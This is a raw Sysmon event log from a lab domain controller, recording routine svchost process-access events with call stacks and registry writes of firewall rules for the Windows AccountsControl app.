13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-9|C=S-1-15-3-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|M=microsoft.accountscontrol_cw5n1h2txyewy|Name=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\|PFN=Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{BA9AD02E-B8F1-4B33-BE00-C335F110B645}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 
13241300x800000000000000010755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{35CB5084-8673-4334-AF67-A46582E71FAB}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{851236FE-418B-44C7-A556-82129164B447}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 